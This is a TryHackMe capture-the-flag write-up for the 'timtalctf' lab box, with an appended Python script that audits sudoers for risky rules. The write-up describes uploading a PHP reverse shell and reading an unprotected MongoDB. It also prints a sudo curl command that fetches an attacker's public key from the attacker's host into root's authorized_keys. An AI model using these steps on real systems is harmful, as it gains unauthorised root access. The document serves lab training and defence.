[EN] TryHackMe TimtalCtf WriteUp

Ömer Faruk SÖNMEZ
7 min read · Nov 10, 2021

Room link: tryhackme.com/jr/timtalctf

The first thing we should do is scan the ports. According to the nmap results, only ports 21, 22 and 80 are open, and there are no known exploits for the services running on them.

Then, when we visit the web page, the Apache default page appears. When we examine the source code of that page, we can see a ‘/d3v3l0pm3nt’ comment. We visit the path /d3v3l0pm3nt, but no such page exists.

Now, it’s time for a directory scan. For this I usually prefer Gobuster, but you can use any other tool. After a while, Gobuster finds the directory ‘/d*********t’.

When we visit that page, we can find a text file named “dontforgetit.txt”.

It is a note that contains the FTP credentials and our first flag (base32 encoded).

Then, we log into the FTP server with those credentials. Once logged in, we find a ZIP file and a note, which we transfer to our local system. When we try to extract the ZIP file, it asks for a password. The password is in the note we have just found on the FTP server.

Now, we have another file named “lobby.jpg”. We use Steghide to check whether there is hidden data in it. Yes, there is hidden data, but it is password protected! To crack the password, we need a tool named “Stegseek”. Within a few seconds, Stegseek cracks the password using the “rockyou” wordlist.

Now, we have yet another text file. When we read it, we understand that it is the admin’s to-do list. Through it, we reach another hidden directory: /t3**-u*****-***.

When we visit this page, it says “this page is temporarily moved”. But on the bottom line there is an email address that looks interesting. Its domain (timtal.thm) looks like a virtual host name, so we suspect it might also have subdomains. Now, it’s time for a subdomain scan!

But before the subdomain scan, we must add the ‘timtal.thm’ domain to our ‘hosts’ file. This is required because, on our local machine, timtal.thm has to resolve to the CTF machine’s IP for the subdomain scan to work. You will probably be using a Linux-based system while solving this CTF, so I am going to explain it for Linux.

First, open the /etc/hosts file with root permissions in any text editor. Then go to the last line and add the CTF machine’s IP, a space, and ‘timtal.thm’. Save and quit. Now that I have given the necessary information for Linux-based systems, we can start the subdomain scan!

To run this subdomain scan, I use a tool named “WFUZZ”, but again, you can also use Gobuster. Shortly after starting the scan, we find the subdomain t***.timtal.thm. Of course, we have to add this subdomain to the /etc/hosts file as well.

After editing the hosts file, we visit the subdomain and see that the moved “test-upload” directory is here. Using the upload vulnerability, we can get access to the system. Grab a PHP reverse shell (I’ll use pentest monkey’s one), edit the IP and port for your machine, and finally upload it!

When we upload the payload, we don’t know exactly where the uploaded files are stored. To find them, we need to start a new directory scan against this subdomain. After a while, Gobuster finds the directory ‘/u******’.

When we visit the directory, we can see our payload (and some other payloads that I forgot to delete while building this machine :/). Listen with netcat on the port you wrote into the payload, then execute the payload from the /u****** directory and voila! We have shell access :)

Now, I am going to spawn a TTY shell. Normally it’s not necessary, but if you don’t want some annoying problems with a non-TTY shell, it might be a good choice :) To do it, simply google it :D

Now we are on the system, but not as a normal user. We are www-data, an unprivileged user. This user can only run the web applications that Apache serves; it is a simple security precaution, so we don’t have any sudo permissions. If we navigate the system for a while, we find a directory named “notes” in the “/” directory. At first it might seem empty, but when we list hidden files inside it (ls -a), we find the ‘.note’ file.

This is a note that root wrote for the user. According to this note, MongoDB is installed on the machine, but there is no password protection ¯\_(ツ)_/¯.

Now, we log in by typing “mongo”, and then type “show databases;” to list the databases. There is a non-default database named “timtal”. Let’s check it. To select the database, type “use timtal;”. Then list its collections (the equivalent of tables in MySQL) using “show collections;”. There are 2 collections. One of them holds our second flag (hex encoded), the other one the password of the user timtal. To read a collection, use “db.<collectionName>.find();”.

Let’s exit MongoDB and log in as the timtal user.

In the user’s home directory, we find our 3rd flag :)

In the end, only the root flag is left. Now that we have a normal user, we might have some sudo permissions. Let’s check with ‘sudo -l’.

Here we see that the user timtal can run the “curl” tool with root permissions. Thinking about how to escalate privileges with this permission, we find that we can’t execute files with ‘curl’, so we can’t get a root shell directly. According to ‘GTFOBins’, the ‘-o’ option lets us save files under any name and in any location, but we still can’t execute anything. After a little brainstorming, we realize that we can put our ‘SSH key’ into root’s authorized keys. If we then log in with that key, it won’t ask for any password. Root’s “authorized keys” file is “/root/.ssh/authorized_keys”.

To do this, we first need to serve the file to the CTF machine. We can’t curl it from the internet, because these machines are only connected to each other. So, on our local machine, go to our user’s home directory, then the “.ssh” directory, and find the “id_rsa.pub” file. If it doesn’t exist, create one by typing ‘ssh-keygen -t rsa’. Now we are going to serve this generated SSH key to the CTF machine. Make sure that you are in the “.ssh” directory and type ‘python3 -m http.server’. This command serves the “.ssh” directory on the local network over HTTP on port 8000.

Now, go back to the CTF machine. We are going to fetch our SSH key and save it to “/root/.ssh/” as “authorized_keys”. To do this, type:

sudo curl http://ip:8000/id_rsa.pub -o /root/.ssh/authorized_keys

Let’s try to log in with our key :) This time we have to use the id_rsa file, not id_rsa.pub.

ssh root@machineip -i id_rsa

And without typing any passwords, we have logged in as root :D
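As an added example (not part of the original writeup), here is a small Python audit for the misconfiguration behind this escalation: a sudo rule that lets a non-root user run a file-writing binary such as curl as root, which is exactly what ‘sudo -l’ revealed. The sudoers lines, user names and paths in it are constructed samples.

```python
"""Flag sudo rules that give a non-root user a root file-write primitive, the
misconfiguration behind this box's sudo curl -o escalation. Samples are constructed."""
import os
import re

# Binaries that write arbitrary files as root (curl -o here; same GTFOBins class).
FILE_WRITE_BINARIES = {"curl", "wget", "tee", "cp", "dd", "mv"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"  # who, on which hosts
    r"(?:\((?P<runas>[^)]*)\)\s*)?"               # optional (runas_user:group)
    r"(?:(?:NO)?(?:PASSWD|SETENV|EXEC):\s*)*"     # tags such as NOPASSWD:
    r"(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return a list of {user, command, reason} dicts for risky rules."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments and blanks
        match = RULE.match(line)
        if not line or line.startswith(SKIP_PREFIXES) or not match:
            continue
        user = match.group("user")
        # An omitted runas spec means root; (ALL) may be root as well.
        runas = (match.group("runas") or "root").split(":")[0].strip()
        if user == "root" or runas not in ("root", "ALL"):
            continue
        for cmd in (c.strip() for c in match.group("cmds").split(",")):
            parts = cmd.split()
            if not parts:
                continue
            binary, args = os.path.basename(parts[0]), parts[1:]
            # Literal args must match exactly; none or a wildcard frees the path.
            if cmd == "ALL":
                reason = "unrestricted root (ALL)"
            elif binary in FILE_WRITE_BINARIES and (not args or any("*" in a for a in args)):
                reason = f"{binary} writes any file as root (e.g. authorized_keys)"
            else:
                continue
            findings.append({"user": user, "command": cmd, "reason": reason})
    return findings

# Constructed sample modelled on the sudo -l result described in the writeup.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
timtal  ALL=(root) NOPASSWD: /usr/bin/curl
ops     ALL=(root) /usr/bin/tee -a /var/log/ops.log, /bin/cat
%admin  ALL=(ALL) ALL
"""
```

Run it over the real /etc/sudoers (and /etc/sudoers.d/*) of a host you administer; the fix for a hit like the timtal line is to drop the rule or replace it with a wrapper script that fixes the output path.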

Then, we can find our last flag in the /root directory.

Thanks for reading :) Follow for more CTFs.

Writeup by Ömer Faruk SÖNMEZ
